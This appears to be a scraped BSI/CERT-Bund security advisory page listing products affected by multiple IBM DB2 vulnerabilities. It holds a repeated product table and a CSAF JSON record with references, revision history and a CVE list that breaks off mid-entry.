Hitachi / Ops Center
|
cpe:/a:hitachi:ops_center:-
|
— | |
|
Hitachi Ops Center <Viewpoint 10.9.3-00
Hitachi / Ops Center
|
<Viewpoint 10.9.3-00 |
Affected products
Known affected
8 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
EMC Avamar
EMC
|
cpe:/a:emc:avamar:-
|
— | |
|
IBM DB2 11.1
IBM / DB2
|
cpe:/a:ibm:db2:11.1
|
11.1 | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
IBM SPSS Analytic Server
IBM / SPSS
|
cpe:/a:ibm:spss:analytic_server
|
Analytic Server | |
|
IBM DB2 11.5
IBM / DB2
|
cpe:/a:ibm:db2:11.5
|
11.5 | |
|
Hitachi Ops Center <Analyzer 10.9.3-00
Hitachi / Ops Center
|
<Analyzer 10.9.3-00 | ||
|
Hitachi Ops Center
Hitachi / Ops Center
|
cpe:/a:hitachi:ops_center:-
|
— | |
|
Hitachi Ops Center <Viewpoint 10.9.3-00
Hitachi / Ops Center
|
<Viewpoint 10.9.3-00 |
Affected products
Known affected
8 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
EMC Avamar
EMC
|
cpe:/a:emc:avamar:-
|
— | |
|
IBM DB2 11.1
IBM / DB2
|
cpe:/a:ibm:db2:11.1
|
11.1 | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
IBM SPSS Analytic Server
IBM / SPSS
|
cpe:/a:ibm:spss:analytic_server
|
Analytic Server | |
|
IBM DB2 11.5
IBM / DB2
|
cpe:/a:ibm:db2:11.5
|
11.5 | |
|
Hitachi Ops Center <Analyzer 10.9.3-00
Hitachi / Ops Center
|
<Analyzer 10.9.3-00 | ||
|
Hitachi Ops Center
Hitachi / Ops Center
|
cpe:/a:hitachi:ops_center:-
|
— | |
|
Hitachi Ops Center <Viewpoint 10.9.3-00
Hitachi / Ops Center
|
<Viewpoint 10.9.3-00 |
Affected products
Known affected
8 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
EMC Avamar
EMC
|
cpe:/a:emc:avamar:-
|
— | |
|
IBM DB2 11.1
IBM / DB2
|
cpe:/a:ibm:db2:11.1
|
11.1 | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
IBM SPSS Analytic Server
IBM / SPSS
|
cpe:/a:ibm:spss:analytic_server
|
Analytic Server | |
|
IBM DB2 11.5
IBM / DB2
|
cpe:/a:ibm:db2:11.5
|
11.5 | |
|
Hitachi Ops Center <Analyzer 10.9.3-00
Hitachi / Ops Center
|
<Analyzer 10.9.3-00 | ||
|
Hitachi Ops Center
Hitachi / Ops Center
|
cpe:/a:hitachi:ops_center:-
|
— | |
|
Hitachi Ops Center <Viewpoint 10.9.3-00
Hitachi / Ops Center
|
<Viewpoint 10.9.3-00 |
Affected products
Known affected
8 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
EMC Avamar
EMC
|
cpe:/a:emc:avamar:-
|
— | |
|
IBM DB2 11.1
IBM / DB2
|
cpe:/a:ibm:db2:11.1
|
11.1 | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
IBM SPSS Analytic Server
IBM / SPSS
|
cpe:/a:ibm:spss:analytic_server
|
Analytic Server | |
|
IBM DB2 11.5
IBM / DB2
|
cpe:/a:ibm:db2:11.5
|
11.5 | |
|
Hitachi Ops Center <Analyzer 10.9.3-00
Hitachi / Ops Center
|
<Analyzer 10.9.3-00 | ||
|
Hitachi Ops Center
Hitachi / Ops Center
|
cpe:/a:hitachi:ops_center:-
|
— | |
|
Hitachi Ops Center <Viewpoint 10.9.3-00
Hitachi / Ops Center
|
<Viewpoint 10.9.3-00 |
Affected products
Known affected
8 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
EMC Avamar
EMC
|
cpe:/a:emc:avamar:-
|
— | |
|
IBM DB2 11.1
IBM / DB2
|
cpe:/a:ibm:db2:11.1
|
11.1 | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
IBM SPSS Analytic Server
IBM / SPSS
|
cpe:/a:ibm:spss:analytic_server
|
Analytic Server | |
|
IBM DB2 11.5
IBM / DB2
|
cpe:/a:ibm:db2:11.5
|
11.5 | |
|
Hitachi Ops Center <Analyzer 10.9.3-00
Hitachi / Ops Center
|
<Analyzer 10.9.3-00 | ||
|
Hitachi Ops Center
Hitachi / Ops Center
|
cpe:/a:hitachi:ops_center:-
|
— | |
|
Hitachi Ops Center <Viewpoint 10.9.3-00
Hitachi / Ops Center
|
<Viewpoint 10.9.3-00 |
Affected products
Known affected
8 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
EMC Avamar
EMC
|
cpe:/a:emc:avamar:-
|
— | |
|
IBM DB2 11.1
IBM / DB2
|
cpe:/a:ibm:db2:11.1
|
11.1 | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
IBM SPSS Analytic Server
IBM / SPSS
|
cpe:/a:ibm:spss:analytic_server
|
Analytic Server | |
|
IBM DB2 11.5
IBM / DB2
|
cpe:/a:ibm:db2:11.5
|
11.5 | |
|
Hitachi Ops Center <Analyzer 10.9.3-00
Hitachi / Ops Center
|
<Analyzer 10.9.3-00 | ||
|
Hitachi Ops Center
Hitachi / Ops Center
|
cpe:/a:hitachi:ops_center:-
|
— | |
|
Hitachi Ops Center <Viewpoint 10.9.3-00
Hitachi / Ops Center
|
<Viewpoint 10.9.3-00 |
Affected products
Known affected
8 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
EMC Avamar
EMC
|
cpe:/a:emc:avamar:-
|
— | |
|
IBM DB2 11.1
IBM / DB2
|
cpe:/a:ibm:db2:11.1
|
11.1 | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
IBM SPSS Analytic Server
IBM / SPSS
|
cpe:/a:ibm:spss:analytic_server
|
Analytic Server | |
|
IBM DB2 11.5
IBM / DB2
|
cpe:/a:ibm:db2:11.5
|
11.5 | |
|
Hitachi Ops Center <Analyzer 10.9.3-00
Hitachi / Ops Center
|
<Analyzer 10.9.3-00 | ||
|
Hitachi Ops Center
Hitachi / Ops Center
|
cpe:/a:hitachi:ops_center:-
|
— | |
|
Hitachi Ops Center <Viewpoint 10.9.3-00
Hitachi / Ops Center
|
<Viewpoint 10.9.3-00 |
Affected products
Known affected
8 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
EMC Avamar
EMC
|
cpe:/a:emc:avamar:-
|
— | |
|
IBM DB2 11.1
IBM / DB2
|
cpe:/a:ibm:db2:11.1
|
11.1 | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
IBM SPSS Analytic Server
IBM / SPSS
|
cpe:/a:ibm:spss:analytic_server
|
Analytic Server | |
|
IBM DB2 11.5
IBM / DB2
|
cpe:/a:ibm:db2:11.5
|
11.5 | |
|
Hitachi Ops Center <Analyzer 10.9.3-00
Hitachi / Ops Center
|
<Analyzer 10.9.3-00 | ||
|
Hitachi Ops Center
Hitachi / Ops Center
|
cpe:/a:hitachi:ops_center:-
|
— | |
|
Hitachi Ops Center <Viewpoint 10.9.3-00
Hitachi / Ops Center
|
<Viewpoint 10.9.3-00 |
Affected products
Known affected
8 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
EMC Avamar
EMC
|
cpe:/a:emc:avamar:-
|
— | |
|
IBM DB2 11.1
IBM / DB2
|
cpe:/a:ibm:db2:11.1
|
11.1 | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
IBM SPSS Analytic Server
IBM / SPSS
|
cpe:/a:ibm:spss:analytic_server
|
Analytic Server | |
|
IBM DB2 11.5
IBM / DB2
|
cpe:/a:ibm:db2:11.5
|
11.5 | |
|
Hitachi Ops Center <Analyzer 10.9.3-00
Hitachi / Ops Center
|
<Analyzer 10.9.3-00 | ||
|
Hitachi Ops Center
Hitachi / Ops Center
|
cpe:/a:hitachi:ops_center:-
|
— | |
|
Hitachi Ops Center <Viewpoint 10.9.3-00
Hitachi / Ops Center
|
<Viewpoint 10.9.3-00 |
Affected products
Known affected
8 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
EMC Avamar
EMC
|
cpe:/a:emc:avamar:-
|
— | |
|
IBM DB2 11.1
IBM / DB2
|
cpe:/a:ibm:db2:11.1
|
11.1 | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
IBM SPSS Analytic Server
IBM / SPSS
|
cpe:/a:ibm:spss:analytic_server
|
Analytic Server | |
|
IBM DB2 11.5
IBM / DB2
|
cpe:/a:ibm:db2:11.5
|
11.5 | |
|
Hitachi Ops Center <Analyzer 10.9.3-00
Hitachi / Ops Center
|
<Analyzer 10.9.3-00 | ||
|
Hitachi Ops Center
Hitachi / Ops Center
|
cpe:/a:hitachi:ops_center:-
|
— | |
|
Hitachi Ops Center <Viewpoint 10.9.3-00
Hitachi / Ops Center
|
<Viewpoint 10.9.3-00 |
Affected products
Known affected
8 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
EMC Avamar
EMC
|
cpe:/a:emc:avamar:-
|
— | |
|
IBM DB2 11.1
IBM / DB2
|
cpe:/a:ibm:db2:11.1
|
11.1 | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
IBM SPSS Analytic Server
IBM / SPSS
|
cpe:/a:ibm:spss:analytic_server
|
Analytic Server | |
|
IBM DB2 11.5
IBM / DB2
|
cpe:/a:ibm:db2:11.5
|
11.5 | |
|
Hitachi Ops Center <Analyzer 10.9.3-00
Hitachi / Ops Center
|
<Analyzer 10.9.3-00 | ||
|
Hitachi Ops Center
Hitachi / Ops Center
|
cpe:/a:hitachi:ops_center:-
|
— | |
|
Hitachi Ops Center <Viewpoint 10.9.3-00
Hitachi / Ops Center
|
<Viewpoint 10.9.3-00 |
Affected products
Known affected
8 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
EMC Avamar
EMC
|
cpe:/a:emc:avamar:-
|
— | |
|
IBM DB2 11.1
IBM / DB2
|
cpe:/a:ibm:db2:11.1
|
11.1 | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
IBM SPSS Analytic Server
IBM / SPSS
|
cpe:/a:ibm:spss:analytic_server
|
Analytic Server | |
|
IBM DB2 11.5
IBM / DB2
|
cpe:/a:ibm:db2:11.5
|
11.5 | |
|
Hitachi Ops Center <Analyzer 10.9.3-00
Hitachi / Ops Center
|
<Analyzer 10.9.3-00 | ||
|
Hitachi Ops Center
Hitachi / Ops Center
|
cpe:/a:hitachi:ops_center:-
|
— | |
|
Hitachi Ops Center <Viewpoint 10.9.3-00
Hitachi / Ops Center
|
<Viewpoint 10.9.3-00 |
Affected products
Known affected
8 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
EMC Avamar
EMC
|
cpe:/a:emc:avamar:-
|
— | |
|
IBM DB2 11.1
IBM / DB2
|
cpe:/a:ibm:db2:11.1
|
11.1 | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
IBM SPSS Analytic Server
IBM / SPSS
|
cpe:/a:ibm:spss:analytic_server
|
Analytic Server | |
|
IBM DB2 11.5
IBM / DB2
|
cpe:/a:ibm:db2:11.5
|
11.5 | |
|
Hitachi Ops Center <Analyzer 10.9.3-00
Hitachi / Ops Center
|
<Analyzer 10.9.3-00 | ||
|
Hitachi Ops Center
Hitachi / Ops Center
|
cpe:/a:hitachi:ops_center:-
|
— | |
|
Hitachi Ops Center <Viewpoint 10.9.3-00
Hitachi / Ops Center
|
<Viewpoint 10.9.3-00 |
Affected products
Known affected
8 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
EMC Avamar
EMC
|
cpe:/a:emc:avamar:-
|
— | |
|
IBM DB2 11.1
IBM / DB2
|
cpe:/a:ibm:db2:11.1
|
11.1 | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
IBM SPSS Analytic Server
IBM / SPSS
|
cpe:/a:ibm:spss:analytic_server
|
Analytic Server | |
|
IBM DB2 11.5
IBM / DB2
|
cpe:/a:ibm:db2:11.5
|
11.5 | |
|
Hitachi Ops Center <Analyzer 10.9.3-00
Hitachi / Ops Center
|
<Analyzer 10.9.3-00 | ||
|
Hitachi Ops Center
Hitachi / Ops Center
|
cpe:/a:hitachi:ops_center:-
|
— | |
|
Hitachi Ops Center <Viewpoint 10.9.3-00
Hitachi / Ops Center
|
<Viewpoint 10.9.3-00 |
Affected products
Known affected
8 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
EMC Avamar
EMC
|
cpe:/a:emc:avamar:-
|
— | |
|
IBM DB2 11.1
IBM / DB2
|
cpe:/a:ibm:db2:11.1
|
11.1 | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
IBM SPSS Analytic Server
IBM / SPSS
|
cpe:/a:ibm:spss:analytic_server
|
Analytic Server | |
|
IBM DB2 11.5
IBM / DB2
|
cpe:/a:ibm:db2:11.5
|
11.5 | |
|
Hitachi Ops Center <Analyzer 10.9.3-00
Hitachi / Ops Center
|
<Analyzer 10.9.3-00 | ||
|
Hitachi Ops Center
Hitachi / Ops Center
|
cpe:/a:hitachi:ops_center:-
|
— | |
|
Hitachi Ops Center <Viewpoint 10.9.3-00
Hitachi / Ops Center
|
<Viewpoint 10.9.3-00 |
Affected products
Known affected
8 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
EMC Avamar
EMC
|
cpe:/a:emc:avamar:-
|
— | |
|
IBM DB2 11.1
IBM / DB2
|
cpe:/a:ibm:db2:11.1
|
11.1 | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
IBM SPSS Analytic Server
IBM / SPSS
|
cpe:/a:ibm:spss:analytic_server
|
Analytic Server | |
|
IBM DB2 11.5
IBM / DB2
|
cpe:/a:ibm:db2:11.5
|
11.5 | |
|
Hitachi Ops Center <Analyzer 10.9.3-00
Hitachi / Ops Center
|
<Analyzer 10.9.3-00 | ||
|
Hitachi Ops Center
Hitachi / Ops Center
|
cpe:/a:hitachi:ops_center:-
|
— | |
|
Hitachi Ops Center <Viewpoint 10.9.3-00
Hitachi / Ops Center
|
<Viewpoint 10.9.3-00 |
Affected products
Known affected
8 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
EMC Avamar
EMC
|
cpe:/a:emc:avamar:-
|
— | |
|
IBM DB2 11.1
IBM / DB2
|
cpe:/a:ibm:db2:11.1
|
11.1 | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
IBM SPSS Analytic Server
IBM / SPSS
|
cpe:/a:ibm:spss:analytic_server
|
Analytic Server | |
|
IBM DB2 11.5
IBM / DB2
|
cpe:/a:ibm:db2:11.5
|
11.5 | |
|
Hitachi Ops Center <Analyzer 10.9.3-00
Hitachi / Ops Center
|
<Analyzer 10.9.3-00 | ||
|
Hitachi Ops Center
Hitachi / Ops Center
|
cpe:/a:hitachi:ops_center:-
|
— | |
|
Hitachi Ops Center <Viewpoint 10.9.3-00
Hitachi / Ops Center
|
<Viewpoint 10.9.3-00 |
Affected products
Known affected
8 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
EMC Avamar
EMC
|
cpe:/a:emc:avamar:-
|
— | |
|
IBM DB2 11.1
IBM / DB2
|
cpe:/a:ibm:db2:11.1
|
11.1 | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
IBM SPSS Analytic Server
IBM / SPSS
|
cpe:/a:ibm:spss:analytic_server
|
Analytic Server | |
|
IBM DB2 11.5
IBM / DB2
|
cpe:/a:ibm:db2:11.5
|
11.5 | |
|
Hitachi Ops Center <Analyzer 10.9.3-00
Hitachi / Ops Center
|
<Analyzer 10.9.3-00 | ||
|
Hitachi Ops Center
Hitachi / Ops Center
|
cpe:/a:hitachi:ops_center:-
|
— | |
|
Hitachi Ops Center <Viewpoint 10.9.3-00
Hitachi / Ops Center
|
<Viewpoint 10.9.3-00 |
Affected products
Known affected
8 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
EMC Avamar
EMC
|
cpe:/a:emc:avamar:-
|
— | |
|
IBM DB2 11.1
IBM / DB2
|
cpe:/a:ibm:db2:11.1
|
11.1 | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
IBM SPSS Analytic Server
IBM / SPSS
|
cpe:/a:ibm:spss:analytic_server
|
Analytic Server | |
|
IBM DB2 11.5
IBM / DB2
|
cpe:/a:ibm:db2:11.5
|
11.5 | |
|
Hitachi Ops Center <Analyzer 10.9.3-00
Hitachi / Ops Center
|
<Analyzer 10.9.3-00 | ||
|
Hitachi Ops Center
Hitachi / Ops Center
|
cpe:/a:hitachi:ops_center:-
|
— | |
|
Hitachi Ops Center <Viewpoint 10.9.3-00
Hitachi / Ops Center
|
<Viewpoint 10.9.3-00 |
References
12 references
{
"document": {
"aggregate_severity": {
"text": "hoch"
},
"category": "csaf_base",
"csaf_version": "2.0",
"distribution": {
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "de-DE",
"notes": [
{
"category": "legal_disclaimer",
"text": "Das BSI ist als Anbieter f\u00fcr die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch daf\u00fcr verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgf\u00e4ltig im Einzelfall zu pr\u00fcfen."
},
{
"category": "description",
"text": "IBM DB2 ist ein relationales Datenbanksystem (RDBS) von IBM.",
"title": "Produktbeschreibung"
},
{
"category": "summary",
"text": "Ein entfernter, anonymer oder authentisierter Angreifer kann mehrere Schwachstellen in IBM DB2 ausnutzen, um seine Privilegien zu erh\u00f6hen oder einen Denial of Service zu verursachen",
"title": "Angriff"
},
{
"category": "general",
"text": "- Linux\n- UNIX\n- Windows",
"title": "Betroffene Betriebssysteme"
}
],
"publisher": {
"category": "other",
"contact_details": "csaf-provider@cert-bund.de",
"name": "Bundesamt f\u00fcr Sicherheit in der Informationstechnik",
"namespace": "https://www.bsi.bund.de"
},
"references": [
{
"category": "self",
"summary": "WID-SEC-W-2022-0770 - CSAF Version",
"url": "https://wid.cert-bund.de/.well-known/csaf/white/2020/wid-sec-w-2022-0770.json"
},
{
"category": "self",
"summary": "WID-SEC-2022-0770 - Portal Version",
"url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2022-0770"
},
{
"category": "external",
"summary": "IBM Security Bulletin 6198380 vom 2020-04-23",
"url": "https://www.ibm.com/support/pages/node/6198380"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2020:2603 vom 2020-06-17",
"url": "https://access.redhat.com/errata/RHSA-2020:2603"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2020:4807 vom 2020-11-04",
"url": "https://access.redhat.com/errata/RHSA-2020:4807"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2021:3225 vom 2021-08-20",
"url": "https://access.redhat.com/errata/RHSA-2021:3225"
},
{
"category": "external",
"summary": "Hitachi Vulnerability Information HITACHI-SEC-2022-115 vom 2022-05-27",
"url": "https://www.hitachi.co.jp/Prod/comp/soft1/global/security/info/vuls/hitachi-sec-2022-115/index.html"
},
{
"category": "external",
"summary": "IBM Security Bulletin 6605881 vom 2022-07-21",
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-security-vulnerabilities-have-been-identified-in-ibm-db2-shipped-with-ibm-puredata-system-for-operational-analytics/"
},
{
"category": "external",
"summary": "Hitachi Vulnerability Information HITACHI-SEC-2023-144 vom 2023-10-03",
"url": "https://www.hitachi.com/products/it/software/security/info/vuls/hitachi-sec-2023-144/index.html"
},
{
"category": "external",
"summary": "Dell Security Advisory DSA-2024-070 vom 2024-02-03",
"url": "https://www.dell.com/support/kbdoc/000221770/dsa-2024-="
},
{
"category": "external",
"summary": "IBM Security Bulletin 7153639 vom 2024-05-17",
"url": "https://www.ibm.com/support/pages/node/7153639"
},
{
"category": "external",
"summary": "IBM Security Bulletin 7256605 vom 2026-01-09",
"url": "https://www.ibm.com/support/pages/node/7256605"
}
],
"source_lang": "en-US",
"title": "IBM DB2: Mehrere Schwachstellen",
"tracking": {
"current_release_date": "2026-01-08T23:00:00.000+00:00",
"generator": {
"date": "2026-01-09T07:40:17.215+00:00",
"engine": {
"name": "BSI-WID",
"version": "1.5.0"
}
},
"id": "WID-SEC-W-2022-0770",
"initial_release_date": "2020-04-23T22:00:00.000+00:00",
"revision_history": [
{
"date": "2020-04-23T22:00:00.000+00:00",
"number": "1",
"summary": "Initiale Fassung"
},
{
"date": "2020-06-17T22:00:00.000+00:00",
"number": "2",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2020-11-03T23:00:00.000+00:00",
"number": "3",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2021-08-19T22:00:00.000+00:00",
"number": "4",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2022-05-26T22:00:00.000+00:00",
"number": "5",
"summary": "Neue Updates von HITACHI aufgenommen"
},
{
"date": "2022-07-20T22:00:00.000+00:00",
"number": "6",
"summary": "Neue Updates von IBM aufgenommen"
},
{
"date": "2023-10-03T22:00:00.000+00:00",
"number": "7",
"summary": "Neue Updates von HITACHI aufgenommen"
},
{
"date": "2024-02-04T23:00:00.000+00:00",
"number": "8",
"summary": "Neue Updates von Dell aufgenommen"
},
{
"date": "2024-05-16T22:00:00.000+00:00",
"number": "9",
"summary": "Neue Updates von IBM aufgenommen"
},
{
"date": "2026-01-08T23:00:00.000+00:00",
"number": "10",
"summary": "Neue Updates von IBM aufgenommen"
}
],
"status": "final",
"version": "10"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "EMC Avamar",
"product": {
"name": "EMC Avamar",
"product_id": "T014381",
"product_identification_helper": {
"cpe": "cpe:/a:emc:avamar:-"
}
}
}
],
"category": "vendor",
"name": "EMC"
},
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Hitachi Ops Center",
"product": {
"name": "Hitachi Ops Center",
"product_id": "T017562",
"product_identification_helper": {
"cpe": "cpe:/a:hitachi:ops_center:-"
}
}
},
{
"category": "product_version_range",
"name": "\u003cAnalyzer 10.9.3-00",
"product": {
"name": "Hitachi Ops Center \u003cAnalyzer 10.9.3-00",
"product_id": "T030196"
}
},
{
"category": "product_version",
"name": "Analyzer 10.9.3-00",
"product": {
"name": "Hitachi Ops Center Analyzer 10.9.3-00",
"product_id": "T030196-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:hitachi:ops_center:analyzer_10.9.3-00"
}
}
},
{
"category": "product_version_range",
"name": "\u003cViewpoint 10.9.3-00",
"product": {
"name": "Hitachi Ops Center \u003cViewpoint 10.9.3-00",
"product_id": "T030197"
}
},
{
"category": "product_version",
"name": "Viewpoint 10.9.3-00",
"product": {
"name": "Hitachi Ops Center Viewpoint 10.9.3-00",
"product_id": "T030197-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:hitachi:ops_center:viewpoint_10.9.3-00"
}
}
}
],
"category": "product_name",
"name": "Ops Center"
}
],
"category": "vendor",
"name": "Hitachi"
},
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "11.1",
"product": {
"name": "IBM DB2 11.1",
"product_id": "342000",
"product_identification_helper": {
"cpe": "cpe:/a:ibm:db2:11.1"
}
}
},
{
"category": "product_version",
"name": "11.5",
"product": {
"name": "IBM DB2 11.5",
"product_id": "695419",
"product_identification_helper": {
"cpe": "cpe:/a:ibm:db2:11.5"
}
}
}
],
"category": "product_name",
"name": "DB2"
},
{
"branches": [
{
"category": "product_version",
"name": "Analytic Server",
"product": {
"name": "IBM SPSS Analytic Server",
"product_id": "T011787",
"product_identification_helper": {
"cpe": "cpe:/a:ibm:spss:analytic_server"
}
}
}
],
"category": "product_name",
"name": "SPSS"
}
],
"category": "vendor",
"name": "IBM"
},
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Enterprise Linux",
"product": {
"name": "Red Hat Enterprise Linux",
"product_id": "67646",
"product_identification_helper": {
"cpe": "cpe:/o:redhat:enterprise_linux:-"
}
}
}
],
"category": "vendor",
"name": "Red Hat"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2009-0001",
"product_status": {
"known_affected": [
"T014381",
"342000",
"67646",
"T011787",
"695419",
"T030196",
"T017562",
"T030197"
]
},
"release_date": "2020-04-23T22:00:00.000+00:00",
"title": "CVE-2009-0001"
},
{
"cve": "CVE-2014-0114",
"product_status": {
"known_affected": [
"T014381",
"342000",
"67646",
"T011787",
"695419",
"T030196",
"T017562",
"T030197"
]
},
"release_date": "2020-04-23T22:00:00.000+00:00",
"title": "CVE-2014-0114"
},
{
"cve": "CVE-2014-0193",
"product_status": {
"known_affected": [
"T014381",
"342000",
"67646",
"T011787",
"695419",
"T030196",
"T017562",
"T030197"
]
},
"release_date": "2020-04-23T22:00:00.000+00:00",
"title": "CVE-2014-0193"
},
{
"cve": "CVE-2014-3488",
"product_status": {
"known_affected": [
"T014381",
"342000",
"67646",
"T011787",
"695419",
"T030196",
"T017562",
"T030197"
]
},
"release_date": "2020-04-23T22:00:00.000+00:00",
"title": "CVE-2014-3488"
},
{
"cve": "CVE-2015-2156",
"product_status": {
"known_affected": [
"T014381",
"342000",
"67646",
"T011787",
"695419",
"T030196",
"T017562",
"T030197"
]
},
"release_date": "2020-04-23T22:00:00.000+00:00",
"title": "CVE-2015-2156"
},
{
"cve": "CVE-2016-2402",
"product_status": {
"known_affected": [
"T014381",
"342000",
"67646",
"T011787",
"695419",
"T030196",
"T017562",
"T030197"
]
},
"release_date": "2020-04-23T22:00:00.000+00:00",
"title": "CVE-2016-2402"
},
{
"cve": "CVE-2017-12972",
"product_status": {
"known_affected": [
"T014381",
"342000",
"67646",
"T011787",
"695419",
"T030196",
"T017562",
"T030197"
]
},
"release_date": "2020-04-23T22:00:00.000+00:00",
"title": "CVE-2017-12972"
},
{
"cve": "CVE-2017-12973",
"product_status": {
"known_affected": [
"T014381",
"342000",
"67646",
"T011787",
"695419",
"T030196",
"T017562",
"T030197"
]
},
"release_date": "2020-04-23T22:00:00.000+00:00",
"title": "CVE-2017-12973"
},
{
"cve": "CVE-2017-12974",
"product_status": {
"known_affected": [
"T014381",
"342000",
"67646",
"T011787",
"695419",
"T030196",
"T017562",
"T030197"
]
},
"release_date": "2020-04-23T22:00:00.000+00:00",
"title": "CVE-2017-12974"
},
{
"cve": "CVE-2017-18640",
"product_status": {
"known_affected": [
"T014381",
"342000",
"67646",
"T011787",
"695419",
"T030196",
"T017562",
"T030197"
]
},
"release_date": "2020-04-23T22:00:00.000+00:00",
"title": "CVE-2017-18640"
},
{
"cve": "CVE-2017-3734",
"product_status": {
"known_affected": [
"T014381",
"342000",
"67646",
"T011787",
"695419",
"T030196",
"T017562",
"T030197"
]
},
"release_date": "2020-04-23T22:00:00.000+00:00",
"title": "CVE-2017-3734"
},
{
"cve": "CVE-2017-5637",
"product_status": {
"known_affected": [
"T014381",
"342000",
"67646",
"T011787",
"695419",
"T030196",
"T017562",
"T030197"
]
},
"release_date": "2020-04-23T22:00:00.000+00:00",
"title": "CVE-2017-5637"
},
{
"cve": "CVE-2018-10237",
"product_status": {
"known_affected": [
"T014381",
"342000",
"67646",
"T011787",
"695419",
"T030196",
"T017562",
"T030197"
]
},
"release_date": "2020-04-23T22:00:00.000+00:00",
"title": "CVE-2018-10237"
},
{
"cve": "CVE-2018-11771",
"product_status": {
"known_affected": [
"T014381",
"342000",
"67646",
"T011787",
"695419",
"T030196",
"T017562",
"T030197"
]
},
"release_date": "2020-04-23T22:00:00.000+00:00",
"title": "CVE-2018-11771"
},
{
"cve": "CVE-2018-8009",
"product_status": {
"known_affected": [
"T014381",
"342000",
"67646",
"T011787",
"695419",
"T030196",
"T017562",
"T030197"
]
},
"release_date": "2020-04-23T22:00:00.000+00:00",
"title": "CVE-2018-8009"
},
{
"cve": "CVE-2018-8012",
"product_status": {
"known_affected": [
"T014381",
"342000",
"67646",
"T011787",
"695419",
"T030196",
"T017562",
"T030197"
]
},
"release_date": "2020-04-23T22:00:00.000+00:00",
"title": "CVE-2018-8012"
},
{
"cve": "CVE-2019-0201",
"product_status": {
"known_affected": [
"T014381",
"342000",
"67646",
"T011787",
"695419",
"T030196",
"T017562",
"T030197"
]
},
"release_date": "2020-04-23T22:00:00.000+00:00",
"title": "CVE-2019-0201"
},
{
"cve": "CVE-2019-10086",
"product_status": {
"known_affected": [
"T014381",
"342000",
"67646",
"T011787",
"695419",
"T030196",
"T017562",
"T030197"
]
},
"release_date": "2020-04-23T22:00:00.000+00:00",
"title": "CVE-2019-10086"
},
{
"cve": "CVE-2019-10172",
"product_status": {
"known_affected": [
"T014381",
"342000",
"67646",
"T011787",
"695419",
"T030196",
"T017562",
"T030197"
]
},
"release_date": "2020-04-23T22:00:00.000+00:00",
"title": "CVE-2019-10172"
},
{
